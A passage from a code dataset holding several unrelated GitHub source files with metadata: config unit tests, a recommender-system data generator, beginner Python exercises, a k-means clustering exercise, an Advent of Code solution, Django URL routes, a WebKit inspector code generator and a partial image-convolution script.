getattr(state_estimators, test_params.state_estimation_method)\n if test_params.state_estimation_host == \"edge\":\n self.assertTrue(state_estimator.supervision_level == \"un-supervised\")\n\n def test_chkpt_dir(self) -> None:\n if not hasattr(test_params, \"chkpt_dir\"):\n return\n path = test_params.chkpt_dir\n self.assertTrue(\n os.path.isdir(path),\n f\"Path {path} does not exist. 
Please specify full path.\",\n )\n\n\nclass SimulatorConfigTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_n_samples(self) -> None:\n self.assertTrue(0 < test_params.n_samples, \"Expected n_samples > 0\")\n\n def test_in_distribution_file(self) -> None:\n path = test_params.in_distribution_file\n self.assertTrue(\n os.path.exists(path),\n f\"File {path} does not exist. Please specify full path.\",\n )\n\n def test_out_distribution_file(self) -> None:\n path = test_params.out_distribution_file\n self.assertTrue(\n os.path.exists(path),\n f\"File {path} does not exist. Please specify full path.\",\n )\n\n def test_method(self) -> None:\n self.assertTrue(\n hasattr(distribution_shifts, test_params.distribution_shift),\n \"method not in distribution_shifts\",\n )\n\n def test_attributes(self) -> None:\n if test_params.distribution_shift == \"HardSwitch\":\n self.assertTrue(\"n_shift\" in vars(test_params).keys())\n\n if test_params.distribution_shift == \"UniformSwitch\":\n self.assertTrue(\"n_shift\" in vars(test_params).keys())\n\n if test_params.distribution_shift == \"Static\":\n self.assertTrue(\"distribution\" in vars(test_params).keys())\n\n\ndef main(config: Optional[Union[str, Dict]]):\n param_map = {\n \"config\": ConfigTester,\n \"model_config\": ModelConfigTester,\n \"training_params\": TrainingParamsTester,\n \"training_config\": TrainingConfigTester,\n \"dataset_config\": DatasetConfigTester,\n \"active_params\": ActiveParamsTester,\n \"simulator_config\": SimulatorConfigTester,\n }\n\n global test_params, test_args, test_key, test_schema\n\n if isinstance(config, str):\n args_dict = yaml.safe_load(open(config))\n else:\n args_dict = deepcopy(config)\n\n args_dict[\"config\"] = {\"config\": args_dict[\"config\"]}\n test_args = args_dict\n tests = []\n for test_key in args_dict.keys():\n test_schema = True\n test_params = SimpleNamespace(**args_dict[test_key])\n print(\"\\n\")\n print(test_params)\n if test_key in [\"edge_config\", \"datacenter_config\"]:\n test_schema = False\n for sub_test_key in args_dict[test_key].keys():\n test_params = SimpleNamespace(**args_dict[test_key][sub_test_key])\n print(\"\\n\")\n print(test_params)\n suite = unittest.makeSuite(param_map[sub_test_key])\n tests.append(unittest.TextTestRunner(verbosity=1).run(suite))\n else:\n suite = unittest.makeSuite(param_map[test_key])\n tests.append(unittest.TextTestRunner(verbosity=1).run(suite))\n\n for test in tests:\n if not test.wasSuccessful():\n print(\n f\"Errors in config_file. 
Please run config file tester: tests/test_configs.py\"\n )\n sys.exit()\n return\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\n \"--config_file\",\n type=str,\n default=\"automated_retraining/tests/debug_configs/debug_mnist_al_distributed.yaml\",\n )\n args = parser.parse_args()\n main(args.config_file)\n","repo_name":"IntelLabs/automated-retraining-framework","sub_path":"automated_retraining/tests/test_configs.py","file_name":"test_configs.py","file_ext":"py","file_size_in_byte":11127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"25351249375","text":"import os\nimport random\nimport tempfile\n\nimport numpy as np\nfrom tensorflow.python.keras.utils.data_utils import Sequence\nfrom aprec.recommenders.sequential.sequential_recommender_config import SequentialRecommenderConfig\nfrom multiprocessing_on_dill.context import ForkProcess, ForkContext\nfrom aprec.recommenders.sequential.target_builders.target_builders import TargetBuilder\nfrom aprec.utils.os_utils import shell\n\nclass DataGenerator(Sequence):\n def __init__(self, config:SequentialRecommenderConfig, user_actions,\n n_items, targets_builder: TargetBuilder, shuffle_data = True):\n self.config = config\n self.user_actions = user_actions\n self.sequence_lenghth = config.sequence_length\n self.n_items = n_items\n self.sequences_matrix = None\n self.sequence_splitter = config.sequence_splitter()\n self.sequence_splitter.set_num_items(n_items)\n self.sequence_splitter.set_sequence_len(config.sequence_length)\n self.sequence_splitter.set_actions(user_actions)\n self.targets_builder = targets_builder\n self.targets_builder.set_sequence_len(config.sequence_length)\n self.do_shuffle_data = shuffle_data\n self.reset()\n\n\n def reset(self):\n if self.do_shuffle_data: \n self.shuffle_data()\n history, target = self.split_actions(self.user_actions)\n self.sequences_matrix = self.matrix_for_embedding(history)\n self.targets_builder.set_n_items(self.n_items)\n self.targets_builder.build(target)\n self.current_position = 0\n self.max = self.__len__()\n \n def reset_iterator(self):\n self.current_position = 0\n\n def shuffle_data(self):\n random.shuffle(self.user_actions)\n\n @staticmethod\n def get_features_matrix(user_features, max_user_features):\n result = []\n for features in user_features:\n result.append([0] * (max_user_features - len(features)) + features)\n return np.array(result)\n\n\n def matrix_for_embedding(self, user_actions):\n result = []\n for actions in user_actions:\n result.append(self.config.train_history_vectorizer(actions))\n return np.array(result)\n\n def build_target_matrix(self, user_targets):\n if self.config.sampled_target is None:\n self.build_full_target_matrix(user_targets)\n else:\n self.build_sampled_targets(user_targets)\n\n def split_actions(self, user_actions):\n history = []\n target = []\n if self.config.max_batches_per_epoch is not None:\n max_users = self.config.max_batches_per_epoch * self.config.batch_size\n else:\n max_users = len(user_actions)\n for user in user_actions[:max_users]:\n user_history, user_target = self.sequence_splitter.split(user)\n history.append(user_history)\n target.append(user_target)\n return history, target\n\n def __len__(self):\n return self.sequences_matrix.shape[0] // self.config.batch_size\n\n def __getitem__(self, idx):\n start = idx * self.config.batch_size\n end = (idx + 1) * self.config.batch_size\n history = self.sequences_matrix[start:end]\n model_inputs = [history]\n 
target_inputs, target = self.targets_builder.get_targets(start, end)\n model_inputs += target_inputs\n\n return model_inputs, target \n\n def __next__(self):\n if self.current_position >= self.max:\n raise StopIteration()\n result = self.__getitem__(self.current_position)\n self.current_position += 1\n return result\n\n\ndef reverse_positions(session_len, history_size):\n if session_len >= history_size:\n return list(range(history_size, 0, -1))\n else:\n return [0] * (history_size - session_len) + list(range(session_len, 0, -1))\n\nclass MemmapDataGenerator(Sequence):\n @staticmethod\n def flush(arr, fname):\n arr = np.array(arr)\n shape = arr.shape\n dtype = arr.dtype\n res = np.memmap(fname, shape=shape, dtype=dtype, mode=\"write\")\n res[:] = arr[:]\n res.flush()\n res._mmap.close()\n del(res)\n return fname, shape, dtype\n \n @staticmethod\n def recover(fname, shape, dtype):\n res = np.memmap(fname, shape=shape, dtype=dtype, mode=\"readonly\")\n return res\n\n def __init__(self, data_generator, dir):\n self.tempdir = tempfile.mkdtemp(prefix=\"sequential_train_\", dir=dir)\n self.inputs = []\n self.targets = []\n for i in range(len(data_generator)):\n inputs, target = data_generator[i]\n target_name = os.path.join(self.tempdir, f\"batch_{i}.target\")\n self.targets.append(self.flush(target, target_name))\n mmaped_inputs = []\n for n_input in range(len(inputs)):\n input_name= os.path.join(self.tempdir, f\"batch_{i}_input_{n_input}.input\")\n mmaped_inputs.append(self.flush(inputs[n_input], input_name))\n self.inputs.append(mmaped_inputs)\n pass\n self.current_position = 0\n self.max = self.__len__()\n self.memmaped_objects = {}\n\n def __next__(self):\n if self.current_position >= self.max:\n raise StopIteration()\n result = self.__getitem__(self.current_position)\n self.current_position += 1\n return result\n\n def __len__(self):\n return len(self.targets)\n \n def __getitem__(self, idx):\n if idx not in self.memmaped_objects:\n inputs = []\n for input in self.inputs[idx]:\n inputs.append(self.recover(*input))\n targets = self.recover(*self.targets[idx])\n self.memmaped_objects[idx] = inputs, targets\n return self.memmaped_objects[idx]\n\n def reset(self):\n self.current_position = 0\n self.max = self.__len__()\n\n def cleanup(self):\n for idx in list(self.memmaped_objects.keys()):\n inputs, targets = self.memmaped_objects[idx] \n targets._mmap.close()\n for input in inputs:\n input._mmap.close()\n del(self.memmaped_objects[idx])\n cmd = f\"rm -rf {self.tempdir}\"\n shell(cmd)\n\n \nclass DataGeneratorFactory(object):\n def __init__(self, queue, tempdir, config, *args, **kwargs):\n self.tempdir = tempdir\n self.factory_func = lambda: MemmapDataGenerator(DataGenerator(config, *args, **kwargs), tempdir)\n self.queue = queue\n self.last_generator:MemmapDataGenerator = None\n\n def __call__(self):\n while True:\n self.last_generator = self.factory_func()\n self.queue.put(self.last_generator)\n\n\nclass DataGeneratorAsyncFactory(object):\n def __init__(self, config: SequentialRecommenderConfig, *args, **kwargs) -> None:\n self.tempdir = tempfile.mkdtemp(prefix = \"sequential_recommender_async_factory_\")\n self.config = config\n ctx = ForkContext()\n self.result_queue = ctx.Queue(self.config.data_generator_queue_size)\n self.generator_factory = DataGeneratorFactory(self.result_queue, self.tempdir, config, *args, **kwargs)\n\n def __enter__(self):\n self.processors:List[ForkProcess] = []\n for i in range(self.config.data_generator_processes):\n 
self.processors.append(ForkProcess(target=self.generator_factory))\n self.processors[-1].daemon = True \n self.processors[-1].start()\n return self\n\n def next_generator(self) -> MemmapDataGenerator:\n return self.result_queue.get()\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n for p in self.processors:\n p.terminate()\n p.join()\n cmd = f\"rm -rf {self.tempdir}\"\n shell(cmd)\n\n","repo_name":"asash/gsasrec","sub_path":"recommenders/sequential/data_generator/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":7794,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"} +{"seq_id":"23962335032","text":"# 1) მომხმარებელს კითხეთ თავისი და მამამისის ასაკი, \n# დაუპრინტეთ ყოველ წელს რამდენჯერ უფროსი იქნება მამამისი მასზე.\n\nson_age = int(input(\"enter son age: \"))\ndad_age = int(input(\"enter dad age: \"))\ncurrent_year = int(input(\"enter current year: \"))\nsum_age = dad_age - son_age\n\nfor i in range(10):\n print(\"mamachemi am wels \" + str(current_year + i) + \" iqneba \" + str(sum_age) + \"-it ufrosi chemze\")\n\n# 2) 0 იდან 30-ის ფარგლებში დაპრინტეთ ყველა ლუწი და კენტი რიცხვი, მიუწერეთ გვერდზე \n# კენტია თუ ლუწი\n\ni = 1\nwhile i < 30:\n print(i, \"odd\")\n print(i+1, \"even\")\n i += 2\n\n\n\n","repo_name":"beridzezura14/Module-1","sub_path":"Day 5/homework/homework-5.py","file_name":"homework-5.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"ka","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15025829542","text":"'''\nClustering the fish data\n\nYou'll now use your standardization and clustering pipeline from the previous \nexercise to cluster the fish by their measurements, and then create a \ncross-tabulation to compare the cluster labels with the fish species.\n\nAs before, samples is the 2D array of fish measurements. 
Your pipeline is \navailable as pipeline, and the species of every fish sample is given by the \nlist species.\n\nINSTRUCTIONS\n100XP\nImport pandas as pd.\nFit the pipeline to the fish measurements samples.\nObtain the cluster labels for samples by using the .predict() method of pipeline.\nUsing pd.DataFrame(), create a DataFrame df with two columns named 'labels' \nand 'species', using labels and species, respectively, for the column values.\nUsing pd.crosstab(), create a cross-tabulation ct of df['labels'] and \ndf['species'].\n'''\n#Done by DataCamp\n# Perform the necessary imports\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cluster import KMeans\nimport pandas as pd\n\n# Create scaler: scaler\nscaler = StandardScaler()\n\n# Create KMeans instance: kmeans\nkmeans = KMeans(n_clusters=4, random_state=42)\n\n# Create pipeline: pipeline\npipeline = make_pipeline(scaler, kmeans)\n\nsamples = pd.read_csv('E:/DataCamp/Unsupervised-learning-in-python/data/fish.csv',\n header=None)\n\nspecies = samples[0].tolist()\n\nsamples = samples.drop(samples.columns[0], axis = 1)\n\nsamples = samples.values\n\n#End done by DataCamp\n\n# Fit the pipeline to samples\npipeline.fit(samples)\n\n# Calculate the cluster labels: labels\nlabels = pipeline.predict(samples)\n\n# Create a DataFrame with labels and species as columns: df\ndf = pd.DataFrame({'labels': labels, 'species': species})\n\n# Create crosstab: ct\nct = pd.crosstab(df['labels'], df['species'])\n\n# Display ct\nprint(ct)","repo_name":"GrinningGeek/DataCamp_Notes","sub_path":"Unsupervised-learning-in-python/01-clustering-for-dataset-exploration/07-clustering-the-fish-data.py","file_name":"07-clustering-the-fish-data.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4274730678","text":"import collections\nimport copy\nimport math\nimport regex\n\nfrom functools import reduce\nfrom itertools import product\n\n\ndef main():\n\tinput = []\n\n\twith open(\"input.txt\") as f:\n\t\tfor line in f:\n\t\t\tif line.strip() == \"\":\n\t\t\t\tcontinue\n\n\t\t\tmatch = regex.match(r\"((\\w+)\\W*)* \\(contains ((\\w+)\\W*)*\\)\", line)\n\t\t\tinput.append((match.captures(2), match.captures(4)))\n\n\tall_ingredients = [x for sublist in input for x in sublist[0]]\n\tallergen_map = {x: [] for x in set(all_ingredients)}\n\tallergens = {x for sublist in input for x in sublist[1]}\n\n\tfor allergen in allergens:\n\t\tingredients = [set(x[0]) for x in input if allergen in x[1]]\n\t\tcommon_ingredients = ingredients.pop().intersection(*ingredients)\n\t\tfor i in common_ingredients:\n\t\t\tallergen_map[i].append(allergen)\n\n\tsafe_ingredients = [a for a, v in allergen_map.items() if len(v) == 0]\n\tprint(sum([all_ingredients.count(x) for x in safe_ingredients]))\n\n\treduced_allergen_map = {ing: allergens for ing, allergens in allergen_map.items() if len(allergens) > 0}\n\tdefinitive_allergen_map = {ing: None for ing in reduced_allergen_map.keys()}\n\n\twhile None in definitive_allergen_map.values():\n\t\tto_reduce = {ing: allergens for ing, allergens in reduced_allergen_map.items() if len(allergens) == 1}\n\t\tfor ing, allergens in to_reduce.items():\n\t\t\tdefinitive_allergen_map[ing] = allergens[0]\n\t\t\tdel reduced_allergen_map[ing]\n\n\t\t\tfor r_ing, r_allergens in reduced_allergen_map.items():\n\t\t\t\tif allergens[0] in r_allergens:\n\t\t\t\t\tr_allergens.remove(allergens[0])\n\n\tia_pairs = 
[(k, v) for k, v in definitive_allergen_map.items()]\n\tprint(\",\".join([y[0] for y in sorted(ia_pairs, key=lambda x: x[1])]))\n\n\nmain()\n","repo_name":"waiwaing/advent-of-code-2020","sub_path":"21/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20358827172","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nimport app.views as landing_views\n\nurlpatterns = [\n url(r'^grappelli/', include('grappelli.urls')),\n url(r'^admin/', admin.site.urls),\n url(r'^app/', include('frontend.urls')),\n url(r'^accounts/', include('allauth.urls')),\n url(r'^api/', include('app.api')),\n url(r'^$', landing_views.index),\n]\n","repo_name":"thefedoration/tracker-widgets","sub_path":"app/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11207662296","text":"import logging\nimport string\nfrom string import Template\n\ntry:\n from .cpp_generator import CppGenerator\n from .cpp_generator_templates import CppGeneratorTemplates as CppTemplates\n from .generator import Generator, ucfirst\n from .models import ObjectType, ArrayType, AliasedType, EnumType\nexcept ImportError:\n from cpp_generator import CppGenerator\n from cpp_generator_templates import CppGeneratorTemplates as CppTemplates\n from generator import Generator, ucfirst\n from models import ObjectType, ArrayType, AliasedType, EnumType\n\nlog = logging.getLogger('global')\n\n\nclass CppBackendDispatcherImplementationGenerator(CppGenerator):\n def __init__(self, *args, **kwargs):\n CppGenerator.__init__(self, *args, **kwargs)\n\n def output_filename(self):\n return \"%sBackendDispatchers.cpp\" % self.protocol_name()\n\n def domains_to_generate(self):\n return [domain for domain in Generator.domains_to_generate(self) if len(self.commands_for_domain(domain)) > 0]\n\n def generate_output(self):\n secondary_includes = self._generate_secondary_header_includes()\n\n if self.model().framework.setting('alternate_dispatchers', False):\n secondary_includes.append('')\n secondary_includes.append('#if ENABLE(INSPECTOR_ALTERNATE_DISPATCHERS)')\n secondary_includes.append('#include \"%sAlternateBackendDispatchers.h\"' % self.protocol_name())\n secondary_includes.append('#endif // ENABLE(INSPECTOR_ALTERNATE_DISPATCHERS)')\n\n header_args = {\n 'primaryInclude': '\"%sBackendDispatchers.h\"' % self.protocol_name(),\n 'secondaryIncludes': '\\n'.join(secondary_includes),\n }\n\n sections = []\n sections.append(self.generate_license())\n sections.append(Template(CppTemplates.ImplementationPrelude).substitute(None, **header_args))\n sections.append(\"\\n\".join(map(self._generate_handler_class_destructor_for_domain, self.domains_to_generate())))\n sections.extend(list(map(self._generate_dispatcher_implementations_for_domain, self.domains_to_generate())))\n sections.append(Template(CppTemplates.ImplementationPostlude).substitute(None, **header_args))\n return \"\\n\\n\".join(sections)\n\n # Private methods.\n\n def _generate_secondary_header_includes(self):\n header_includes = [\n ([\"JavaScriptCore\", \"WebKit\"], (\"JavaScriptCore\", \"inspector/InspectorFrontendRouter.h\")),\n ([\"JavaScriptCore\", \"WebKit\"], (\"WTF\", \"wtf/NeverDestroyed.h\")),\n ]\n return self.generate_includes_from_entries(header_includes)\n\n\n def _generate_handler_class_destructor_for_domain(self, 
domain):\n destructor_args = {\n 'domainName': domain.domain_name\n }\n destructor = '%(domainName)sBackendDispatcherHandler::~%(domainName)sBackendDispatcherHandler() { }' % destructor_args\n return self.wrap_with_guard_for_condition(domain.condition, destructor)\n\n def _generate_dispatcher_implementations_for_domain(self, domain):\n implementations = []\n\n constructor_args = {\n 'domainName': domain.domain_name,\n }\n implementations.append(Template(CppTemplates.BackendDispatcherImplementationDomainConstructor).substitute(None, **constructor_args))\n\n commands = self.commands_for_domain(domain)\n\n if len(commands) <= 5:\n implementations.append(self._generate_small_dispatcher_switch_implementation_for_domain(domain))\n else:\n implementations.append(self._generate_large_dispatcher_switch_implementation_for_domain(domain))\n\n for command in commands:\n if command.is_async:\n implementations.append(self._generate_async_dispatcher_class_for_domain(command, domain))\n implementations.append(self._generate_dispatcher_implementation_for_command(command, domain))\n\n return self.wrap_with_guard_for_condition(domain.condition, '\\n\\n'.join(implementations))\n\n def _generate_small_dispatcher_switch_implementation_for_domain(self, domain):\n commands = self.commands_for_domain(domain)\n\n cases = []\n\n first_command_string = \"\\n\".join([\n ' if (protocol_method == \"%s\"_s) {' % commands[0].command_name,\n ' %s(protocol_requestId, WTFMove(protocol_parameters));' % commands[0].command_name,\n ' return;',\n ' }',\n ])\n cases.append(self.wrap_with_guard_for_condition(commands[0].condition, first_command_string))\n\n for command in commands[1:]:\n additional_command_string = \"\\n\".join([\n ' if (protocol_method == \"%s\"_s) {' % command.command_name,\n ' %s(protocol_requestId, WTFMove(protocol_parameters));' % command.command_name,\n ' return;',\n ' }',\n ])\n cases.append(self.wrap_with_guard_for_condition(command.condition, additional_command_string))\n\n switch_args = {\n 'domainName': domain.domain_name,\n 'dispatchCases': \"\\n\".join(cases)\n }\n\n return Template(CppTemplates.BackendDispatcherImplementationSmallSwitch).substitute(None, **switch_args)\n\n def _generate_large_dispatcher_switch_implementation_for_domain(self, domain):\n commands = self.commands_for_domain(domain)\n\n cases = []\n for command in commands:\n args = {\n 'domainName': domain.domain_name,\n 'commandName': command.command_name\n }\n cases.append(self.wrap_with_guard_for_condition(command.condition, ' { \"%(commandName)s\"_s, &%(domainName)sBackendDispatcher::%(commandName)s },' % args))\n\n switch_args = {\n 'domainName': domain.domain_name,\n 'dispatchCases': \"\\n\".join(cases)\n }\n\n return Template(CppTemplates.BackendDispatcherImplementationLargeSwitch).substitute(None, **switch_args)\n\n def _generate_async_dispatcher_class_for_domain(self, command, domain):\n return_assignments = []\n callback_parameters = []\n\n for parameter in command.return_parameters:\n parameter_name = parameter.parameter_name\n if parameter.is_optional:\n parameter_name = 'opt_' + parameter_name\n\n parameter_value = parameter_name\n\n _type = parameter.type\n if isinstance(_type, AliasedType):\n _type = _type.aliased_type\n if isinstance(_type, EnumType) and _type.is_anonymous:\n _type = _type.primitive_type\n\n if _type.is_enum():\n if parameter.is_optional:\n parameter_value = '*' + parameter_value\n parameter_value = 'Protocol::%s::getEnumConstantValue(%s)' % (self.helpers_namespace(), parameter_value)\n elif 
CppGenerator.should_release_argument(_type, parameter.is_optional):\n parameter_value = parameter_value + '.releaseNonNull()'\n elif CppGenerator.should_dereference_argument(_type, parameter.is_optional):\n parameter_value = '*' + parameter_value\n elif CppGenerator.should_move_argument(_type, parameter.is_optional):\n parameter_value = 'WTFMove(%s)' % parameter_value\n\n param_args = {\n 'keyedSetMethod': CppGenerator.cpp_setter_method_for_type(_type),\n 'parameterKey': parameter.parameter_name,\n 'parameterName': parameter_name,\n 'parameterValue': parameter_value,\n }\n\n callback_parameters.append('%s %s' % (CppGenerator.cpp_type_for_command_return_argument(_type, parameter.is_optional), parameter_name))\n\n if parameter.is_optional:\n return_assignments.append(' if (!!%(parameterName)s)' % param_args)\n return_assignments.append(' protocol_jsonMessage->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % param_args)\n else:\n return_assignments.append(' protocol_jsonMessage->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % param_args)\n\n async_args = {\n 'domainName': domain.domain_name,\n 'callbackName': ucfirst(command.command_name) + 'Callback',\n 'callbackParameters': \", \".join(callback_parameters),\n 'returnAssignments': \"\\n\".join(return_assignments)\n }\n return self.wrap_with_guard_for_condition(command.condition, Template(CppTemplates.BackendDispatcherImplementationAsyncCommand).substitute(None, **async_args))\n\n def _generate_dispatcher_implementation_for_command(self, command, domain):\n parameter_declarations = []\n parameter_enum_resolutions = []\n alternate_dispatcher_method_parameters = ['protocol_requestId']\n method_parameters = []\n\n for parameter in command.call_parameters:\n parameter_name = parameter.parameter_name\n if parameter.is_optional:\n parameter_name = 'opt_' + parameter_name\n parameter_name = 'in_' + parameter_name\n\n variable_name = parameter_name\n\n _type = parameter.type\n if isinstance(_type, AliasedType):\n _type = _type.aliased_type\n if isinstance(_type, EnumType) and _type.is_anonymous:\n _type = _type.primitive_type\n\n if _type.is_enum():\n parameter_name = parameter_name + '_json'\n\n alternate_dispatcher_method_parameters.append(parameter_name)\n\n enum_args = {\n 'helpersNamespace': self.helpers_namespace(),\n 'parameterKey': parameter.parameter_name,\n 'enumType': CppGenerator.cpp_protocol_type_for_type(_type),\n 'enumVariableName': variable_name,\n 'stringVariableName': parameter_name,\n }\n\n if len(parameter_enum_resolutions):\n parameter_enum_resolutions.append('')\n parameter_enum_resolutions.append(' auto %(enumVariableName)s = Protocol::%(helpersNamespace)s::parseEnumValueFromString<%(enumType)s>(%(stringVariableName)s);' % enum_args)\n if parameter.is_optional:\n parameter_expression = 'WTFMove(%s)' % variable_name\n else:\n parameter_enum_resolutions.append(' if (!%(enumVariableName)s) {' % enum_args)\n parameter_enum_resolutions.append(' m_backendDispatcher->reportProtocolError(BackendDispatcher::ServerError, makeString(\"Unknown %(parameterKey)s: \"_s, %(stringVariableName)s));' % enum_args)\n parameter_enum_resolutions.append(' return;')\n parameter_enum_resolutions.append(' }')\n parameter_expression = '*' + variable_name\n else:\n if _type.raw_name() == 'string':\n parameter_expression = variable_name\n elif parameter.is_optional:\n parameter_expression = 'WTFMove(%s)' % variable_name\n elif _type.raw_name() in ['boolean', 'integer', 'number']:\n parameter_expression = '*' + 
variable_name\n else:\n parameter_expression = variable_name + '.releaseNonNull()'\n alternate_dispatcher_method_parameters.append(parameter_expression)\n method_parameters.append(parameter_expression)\n\n param_args = {\n 'parameterKey': parameter.parameter_name,\n 'parameterName': parameter_name,\n 'keyedGetMethod': CppGenerator.cpp_getter_method_for_type(_type),\n 'required': 'false' if parameter.is_optional else 'true',\n }\n parameter_declarations.append(' auto %(parameterName)s = m_backendDispatcher->%(keyedGetMethod)s(protocol_parameters.get(), \"%(parameterKey)s\"_s, %(required)s);' % param_args)\n\n if command.is_async:\n method_parameters.append('adoptRef(*new %sBackendDispatcherHandler::%s(m_backendDispatcher.copyRef(), protocol_requestId))' % (domain.domain_name, '%sCallback' % ucfirst(command.command_name)))\n\n command_args = {\n 'domainName': domain.domain_name,\n 'commandName': command.command_name,\n 'parameterDeclarations': '\\n'.join(parameter_declarations),\n 'invocationParameters': ', '.join(method_parameters),\n 'alternateInvocationParameters': ', '.join(alternate_dispatcher_method_parameters),\n }\n\n lines = []\n if len(command.call_parameters) == 0:\n lines.append('void %(domainName)sBackendDispatcher::%(commandName)s(long protocol_requestId, RefPtr<JSON::Object>&&)' % command_args)\n else:\n lines.append('void %(domainName)sBackendDispatcher::%(commandName)s(long protocol_requestId, RefPtr<JSON::Object>&& protocol_parameters)' % command_args)\n lines.append('{')\n\n if len(command.call_parameters) > 0:\n lines.append(Template(CppTemplates.BackendDispatcherImplementationPrepareCommandArguments).substitute(None, **command_args))\n\n if self.model().framework.setting('alternate_dispatchers', False):\n lines.append('#if ENABLE(INSPECTOR_ALTERNATE_DISPATCHERS)')\n lines.append(' if (m_alternateDispatcher) {')\n lines.append(' m_alternateDispatcher->%(commandName)s(%(alternateInvocationParameters)s);' % command_args)\n lines.append(' return;')\n lines.append(' }')\n lines.append('#endif // ENABLE(INSPECTOR_ALTERNATE_DISPATCHERS)')\n lines.append('')\n\n if len(parameter_enum_resolutions):\n lines.extend(parameter_enum_resolutions)\n lines.append('')\n\n if command.is_async:\n lines.append(' m_agent->%(commandName)s(%(invocationParameters)s);' % command_args)\n else:\n result_destructured_names = []\n result_conversion_lines = []\n for parameter in command.return_parameters:\n parameter_name = parameter.parameter_name\n if parameter.is_optional:\n parameter_name = 'opt_' + parameter_name\n parameter_name = 'out_' + parameter_name\n\n result_destructured_names.append(parameter_name)\n\n parameter_value = parameter_name\n\n _type = parameter.type\n if isinstance(_type, AliasedType):\n _type = _type.aliased_type\n if isinstance(_type, EnumType) and _type.is_anonymous:\n _type = _type.primitive_type\n\n if _type.is_enum():\n if parameter.is_optional:\n parameter_value = '*' + parameter_value\n parameter_value = 'Protocol::%s::getEnumConstantValue(%s)' % (self.helpers_namespace(), parameter_value)\n elif CppGenerator.should_release_argument(_type, parameter.is_optional):\n parameter_value = parameter_value + '.releaseNonNull()'\n elif CppGenerator.should_dereference_argument(_type, parameter.is_optional):\n parameter_value = '*' + parameter_value\n elif CppGenerator.should_move_argument(_type, parameter.is_optional):\n parameter_value = 'WTFMove(%s)' % parameter_value\n\n param_args = {\n 'keyedSetMethod': CppGenerator.cpp_setter_method_for_type(_type),\n 'parameterKey': 
parameter.parameter_name,\n 'parameterName': parameter_name,\n 'parameterValue': parameter_value,\n }\n\n if parameter.is_optional:\n result_conversion_lines.append(' if (!!%(parameterName)s)' % param_args)\n result_conversion_lines.append(' protocol_jsonMessage->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % param_args)\n else:\n result_conversion_lines.append(' protocol_jsonMessage->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % param_args)\n\n lines.append(' auto result = m_agent->%(commandName)s(%(invocationParameters)s);' % command_args)\n lines.append(' if (!result) {')\n lines.append(' ASSERT(!result.error().isEmpty());')\n lines.append(' m_backendDispatcher->reportProtocolError(BackendDispatcher::ServerError, result.error());')\n lines.append(' return;')\n lines.append(' }')\n lines.append('')\n if len(result_destructured_names) == 1:\n lines.append(' auto %s = WTFMove(result.value());' % result_destructured_names[0])\n lines.append('')\n elif len(result_destructured_names) > 1:\n lines.append(' auto [%s] = WTFMove(result.value());' % \", \".join(result_destructured_names))\n lines.append('')\n lines.append(' auto protocol_jsonMessage = JSON::Object::create();')\n lines.extend(result_conversion_lines)\n lines.append(' m_backendDispatcher->sendResponse(protocol_requestId, WTFMove(protocol_jsonMessage), false);')\n\n lines.append('}')\n return self.wrap_with_guard_for_condition(command.condition, \"\\n\".join(lines))\n","repo_name":"WebKit/WebKit","sub_path":"Source/JavaScriptCore/inspector/scripts/codegen/generate_cpp_backend_dispatcher_implementation.py","file_name":"generate_cpp_backend_dispatcher_implementation.py","file_ext":"py","file_size_in_byte":17512,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"} +{"seq_id":"24818847096","text":"import numpy as np\nimport matplotlib.image as image\nimport matplotlib.pyplot as plt\n\n\n# Convolution operation using the fixed array shown in the Fig. 
1 as the input and the filter\ndef convolution_fixed():\n np.set_printoptions(linewidth=9)\n img = np.array([[[0], [2], [1]], [[3], [4], [2]], [[1], [0], [3]]])\n print(\"The input array is:\\n\", img)\n kernel = np.array([[[1], [2]], [[2], [1]]])\n print(\"The kernel array is:\\n\", kernel)\n img_conv = np.zeros((2, 2, 1))\n for i in range(2):\n for j in range(2):\n input = img[i:i + len(kernel), j:j + len(kernel)]\n img_conv[i][j] = np.sum(np.multiply(input, kernel))\n print(\"The output array is:\\n\", img_conv)\n\n\ndef grayscale(img):\n R, G, B = img[:, :, 0], img[:, :, 1], img[:, :, 2]\n imgGray = 0.2989 * R + 0.5870 * G + 0.1140 * B\n plt.imshow(imgGray, cmap='gray')\n pltTitle = 'Grayscale images of Dog image'\n plt.title(pltTitle)\n plt.show()\n # print('grayscale image: ', imgGray)\n return imgGray\n\n\n# Normalization function for grayscale arrays\ndef normalized_grayscale(array):\n norm = (array - np.min(array)) / (np.max(array) - np.min(array))\n # array = array * norm * 255\n return array * norm * 255\n\n\n# General convolution operation function with grayscale map and convolution kernel as input\ndef convolution_operation(imgGray, conv_filter):\n height, width = imgGray.shape\n size = len(conv_filter)\n # create a new numpy array with padding to make sure the filtered image has the same size as the input image\n # It must be noted, however, that filters of odd size will facilitate the calculation\n # img_padding = np.zeros((height + size - 1, width + size - 1))\n # img_padding[((size - 1) // 2):((size 